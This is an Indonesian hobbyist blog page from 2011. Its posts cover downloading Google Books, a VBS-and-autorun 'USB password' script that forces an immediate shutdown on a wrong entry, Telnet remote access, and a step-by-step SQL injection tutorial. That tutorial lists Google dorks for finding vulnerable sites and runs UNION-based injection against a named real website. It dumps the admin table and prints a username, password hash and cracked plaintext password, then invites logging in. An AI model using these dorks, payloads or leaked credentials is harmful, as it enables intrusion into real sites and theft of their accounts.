This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Sabtu, 18 Juni 2011

Cara Download E-book di Google book

Sebelumnya saya pernah menjelaskan dimana kita bisa mencari dan membaca buku dengan Google books tapi sayangnya kita harus membaca buku secara online. Sehingga kurang fleksibel bagi yang tidak memiliki koneksi internet atau menggunakan koneksi limited. Nah agar anda bisa membaca buku tanpa koneksi internet. Anda bisa menggunakan Google Book Downloader. Dengan Google book downloader, anda bisa mendownload buku langsung ke PC anda. Sehingga anda bisa bebas membaca buku yang anda inginkan kapanpun tanpa harus tersambung ke internet.

Bagi anda yang ingin mendownload buku dari Google books. Berikut caranya:

1. Download Google book downloader disini

2. Setelah itu instal program Google book downloader di komputer anda. Untuk pengguna windows XP, anda harus menginstal aplikasi Microsoft .NET Framework 3.5 SP1 terlebih dahulu. Jika belum punya, silahkan download aplikasinya disini.

3. Jika sudah, kunjungi situs Google books untuk mencari buku yang anda inginkan.

4. Jika sudah ketemu, lihat pada address bar. Disana ada tulisan http://books.google.com/books?id=xxxxxxxxxxxx

5. Copy teks yang dicetak tebal

6. Kalau sudah, buka Google Book Downloader

7. Pada bagian Book code, masukkan kode yang anda copy sebelumnya

8. Klik Check untuk menganalisa

9. Kemudian klik Download all. Tunggu beberapa saat hingga proses download selesai.

10. Jika sudah, klik Save entire book as untuk menyimpan filenya ke komp anda.

11. Selesai. Selamat membaca...

Cara mudah mencari dan baca E-book di internet

Ntah kapan Google menambahkan fitur pencarian baru yaitu Google books/ Buku Google pada halaman utama Google Search. Tapi yang pasti dengan adanya fitur ini tentu akan memberikan pilihan tambahan bagi pengguna internet untuk mencari informasi.


Sesuai dengan namanya maka fitur yang satu ini berfungsi untuk menelusuri buku-buku yang ada di internet. Buku-buku yang ditelusuri berasal dari perpustakaan dan penerbit buku yang ada diseluruh dunia. Sehingga rata-rata buku yang ingin anda cari bisa ditemukan disitu.

Dan hebatnya adalah Google books menampilkan sebagian besar dari konten buku yang ingin kita cari sehingga kita bisa menikmati isi bukunya tanpa harus merogeh kocek untuk membelinya atau berdiri lama ditoko buku untuk membacanya. Tapi anda cukup masuk ke Google books lalu mengetik judul buku yang ingin anda baca lalu dengan seketika buku yang ingin anda cari akan muncul dihadapan pc anda dan siap untuk disantap. hehehe.. kayak makanan aja :)

Nah sebagai contoh saya mencari buku "Rich Dad Poor Dad". Dan berikut adalah hasil tampilannya.


Untuk membaca halaman berikutnya tinggal discroll ke bawah atau drag keatas seperti layaknya membaca file .pdf. Jika anda tertarik untuk membeli bukunya, Google books juga menyertai alamat toko buku yang menyediakan buku tersebut. Sehingga anda bisa dengan mudah mendapatkan buku yang anda inginkan.

Punya buku yang ingin dicari atau dibaca? Langsung aja ke TKP sengihnampakgigi

Rabu, 08 Juni 2011

Membuat Flash disk berpasword

1. Buka Notepad
( Caranya : Start>>All Programs>>Accessories>>Notepad atau masuk di RUN lalu ketik notepad dan Enter) lalu copy paste script kode dibawah ini ke notepad
Code :
Content
on error goto 0
dim s,quest,sd,m,winpath,fs
set sd=createobject(“Wscript.shell”)
set fs=createobject(“Scripting.FileSystemObject”)
set winpath=fs.getspecialfolder(0)
set s=wscript.createobject(“wscript.shell”)
do while quest=”"
quest=inputbox(“Masukkan PASSWORD, Jika anda salah dalam memasukkan password, maka komputer ini akan ShutDown!!!”, “masukkin password gan!”)
if quest=”" then
m=MsgBox(“Maaf anda belum memasukkan password…!”, 0+0+48, “http://pedasmaniscinta.blogspot.com”)
end if
loop
if quest=”TULIS PASSWORD DISINI” then
s.run “shutdown -a”
sd.run winpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
else
s.run “shutdown -s -t 0″
end if
TULIS PASSWORD DISINI ganti sesuai keinginan ente, itu adalah sebagai tempat password ente. Pemakaian huruf kapital sangat berpengaruh. ane sarankan memakai angka yang sudah diingat di luar kepala.
lalu save as dengan nama “passwordlock.vbs” tanpa tente kutip, sebelum di save as pastikan pilih all files.
2. sesudah selesai diatas.
lalu buka Notepad lagi, untuk pengaturan otomatis sesudah flashdisk dimasukan di PC.
copy paste script kode dibawah ini ke notepad.
Code:
Content
[Autorun]
shellexecute=wscript.exe passwordlock.vbs
action=FLASHDISK udah DIPASANG PASSWORD
ente bisa ngerubah kata “FLASHDISK UDAH DIPASANG PASSWORD” sesuai kata-kata mutiara keinginan ente sendiri.
sesudah itu lakukan penyimpanan seperti file yang pertama, tetapi pada bagian File name tulislah “autorun.inf” tanpa tanda kutip, sebelum di save as pastikan pilih all files.
Kemudian pindahkan kedua file yang udah ente buat tadi (autorun.inf dan passwordlock.vbs) ke dalam flashdisk ente.
langkah terakhir silahkan ente hidden autorun.inf dan passwordlock.vbs yang udah dibuat tadi.
Cara hidden : klik kanan pada masing- masing autorun.inf dan passwordlock.vbs lalu pilih properties centang kotak yang ada di tanpa hidden.
ne gw tambahin…
klw mw hide autorunnya pke scirpt super hiden aja..
ne gw ksh tutorialnya..
prtma lu buka dulu cmd
caranya
klik start–>run–>ketik cmd
trus masukin script ini
Code:
Content
f:>attrib +h +s passwordlock.vbs (buat hiden file yg prtma)
trus..
Code:
Content
f:>attrib +h +s autorun.inf (buat hidden file autorun)
klw mw munculin tinggal ganti tanda “+” dengan tanda “-”

Senin, 06 Juni 2011

Tutorial SQL Injection

SqLi Tutorial – Sql Injection Tutorial – Sql Injection Artikel – SQL Injection Article
Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.

Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks
Code:

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()

Lebih lengkap, silakan dicari di Google Dorknya :)

PART 1

Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini
Code:

http://www.example.com/index.php?id=3

untuk memeriksa adanya Bug MySQL tinggal tambahin “‘” di akhir URL
contoh
Code:

http://www.example.com/index.php?id=3'

tekan enter sampai ente2 mendapatkan ERROR
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
Code:

http://www.example.com/index.php?id=3 ORDER BY (number)--

setelahnya ane ubah jadi bahasa inggris dah..
capek translatenya
wkwkwkwkwkwkwkwkwkw :P
Yuk kita lanjutkan ke order by 8– kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad & catat kolom-kolom yang anda temukan.
Menemukan kolom yang dapat di akses

Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi & data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Jangan lupa untuk menyisipkan tanda “-” sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-” didepan angka “3“, nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut. Klo lupa, simpan dulu di notepad.
Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Kita ganti angka “1” dengan  “@@version” untuk mengetahui informasi versi database, berikut contohnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
Finding Database Names

Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--

Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)” dengan concat(database()) dan hapus “+ from+information_schema.schemata
Jadi URL nya akan menjadi seperti ini:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
Menemukan Nama Table

Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.
Urlnya akan tampak seperti berikut:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

Nah, hal tersebut akan menampilkan nama table yang digunakan di database.
Menemukan Nama Kolom

Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
Url akan tampak seperti ini:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

Hal tersebut akan memunculkan nama table.
Misalkan nama colom seperti berikut:
admin_username
admin_password
Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--

Sekarang ganti “columnname” dengan kolom yang anda mau ambil informasinta. “0x3a” akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename” dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
Sebagai contoh:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--

Sekarang anda akan mendapatkan informasi username & database
Credit: Madun & Diperbaiki Oleh BinusHacker Team

PART 2

Mari kita coba praktekkan cara diatas!
Sebagai contoh kita mendapatkan target sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30
Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda di akhir URL, contohnya sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30'
Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.
Kita akan mengetahuinya sampai ada informasi “Unknown Column“.
Lakukan pengecekan dengan menggunakan perintah “order by“.
Kita akan mencoba dari 1……..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:

Langkah pengetesannya adalah
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.

Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah “UNION SELECT number,of,columns–” untuk mengatahui kolom mana yang dapat di akses:
Code:



http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--

Anda akan menemukan seperti gambar berikut:


Binus Hacker Tutorial
Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.


Langkah selanjutnya, mencari informasi versi database


SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja “@@version”, pada kolom dimana saja yang bisa dipakai.
Misalkan kolom “6″ kita ganti dengan “@@version”



Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--

Binus Hacker Tutorial

Akan muncul versi database 5.1.39, ini berarti database bisa di inject :)

Mengetahui Database Name


Langsung ajah kita replace kolom yang tadi digunakan “6,2,3″ dibagian mana saja, kita gunakan kolom “6″, kita ganti dengan code berikut “group_concat(schema_name)” , dan jangan lupa tambahkan “from information_schema.schemata–” sesudah kolom terakhir.

Code:


http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Binus Hacker Tutorial
Mengatahui Database Yang Dipakai
Langsung ajah ganti “group_concat(schema_name)” dengan “concat(database())” seperti contoh berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Binus Hacker Tutorial
Selamat, anda telah mengetahui database yang dipakai saat ini adalah “cocobod_gh“.
Mengetahui Nama Tabel

Langsung aja ganti “group_concat(table_name)” dan tambahkan “from information_schema.tables where table_schema=database()–” setelah kolom terakhir.
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Binus Hacker Tutorial
Mengatahui Nama Kolom

Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()–
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
Binus Hacker Tutorial
Mengambil Informasi Yang Ada Di Dalam Kolom

Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:
Code:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Exploit akan menjadi seperti berikut :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
Binus Hacker Tutorial
Dari informasi di atas kita mendapatkan data: “comaster:2c39e3769d300f7e23f8a9e1e21773e7 ,
Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: “2c39e3769d300f7e23f8a9e1e21773e7“, anda akan medapatkan result seperti dibawah:

Binus Hacker Tutorial
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682

Selamat, anda sudah bisa login ke page dengan user & password di atas :)

Credit: Easy|Hack & Revision By BinusHacker Team

Meremote computer menggunakan Telnet

Apa itu Telnet? Telnet (Telecommunication Network) adalah protokol jaringan yang digunakan untuk mengkoneksikan / menghubungkan beberapa komputer dalam satu jaringan. Telnet ini biasanya dijalankan di Command Prompt, interface yang digunakan adalah Command Line Interface (Text Base). Disini saya akan menjelaskan bagaimana mengaktifkan Telnet dan perintah dasar Telnet pada Windows Command Prompt (CMD) di Windows 7. Komputer yang saya Telnet menggunakan Windows XP.
Perintah-perintah dasar pada Command Prompt (CMD) harus mutlak kita ketahui, karena banyak menggunakan perintah dasar CMD untuk menelusuri isi dari komputer yang kita remote. Langkah-lahkahnya sebagai berikut:
  • Di windows ktifkan service Telnet. Dari Start –> Control Panel.
  • Pada pilihan View by, pilih Category.
  • Pilih icon Programs.
  • Pilih Turn Windows features on or off.
  • Cek list Telnet Client.
  • Pilih OK, maka proses fitur untuk Telnet akan di aktifkan, tunggu beberapa saat.
  • Untuk memastikan apakah Telnet kita sudah aktif silahkan cek di Command Prompt (CMD) dan ketikkan perintah “Telnet”. Jika ada tampilan seperti gambar di bawah berarti Service Telnet Client sudah aktif. Untuk keluar ketikkan “quit
Pada Windows XP secara default di Command Prompt perintah Telnet bisa digunakan. Jika kita meremote komputer Windows XP dari komputer lain kita tidak bisa mengakses full. Supaya komputer lain bisa mengakses full kita harus mengaktifkan service Telnet pada Windows XP.
Langkah-langkahnya sebagai berikut:
  • Klik Start > Control Panel.
  • Pilih Administrative Tools.
  • Kemudian pilih icon Services
  • Pilih service Telnet. Secara default Startup Type untuk Telnet bernilai Disable. Jika di remote dari komputer lain tidak memberikan full akses. Disini kita mengubah nilai menjadi Automatic.
  • Klik 2 kali Telnet, kemudian ganti Startup Type menjadi Automatic. Klik tombol Apply > Start > OK
Settingan sudah selesai, kini saatnya kita meremote Windows XP dari Windows 7.
  • Di Windows 7 (dengan IP Address 192.168.1.10) buka Command Prompt (CMD), kemudian ketikkan perintah “telnet
  • Kemudian akan muncul tampilan Welcome to Microsoft Telnet Client.
  • Pada windows XP yang akan diremote menggunakan telnet, sudah diset IP Addressnya, yaitu: 192.168.1.11, yang tentunya sudah terkoneksi dengan Windows 7. Untuk uji koneksi silahkan buka Command Prompt (CMD) baru kemudian lakukan ping ke IP komputer yang akan di remote atau sebaliknya. Jika belum ada replay silahkan perbaiki.
  • Di Windows 7, Ketikkan perintah “open 192.168.1.11“.  kemudian akan ditanyakan “Do You want to send any way?”, jawab ya denga menekan tombol “Y” dan kemudian tekan Enter.
  • Setelah itu minta login user pada windows XP. Ketikkan Administrator dan password.
  • Akhirnya selesai juga. Jika berhasil tampilannya akan seperti dibawah ini. Disini kita bisa melihat, edit, menghapus, dan sebagainya.
Semoga bermanfaat   ^_^. Jika belum berhasil dan menemukan kendala silahkan di Comment. (Edittor : Adam)
Referensi:
http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/telnet_commands.mspx?mfr=true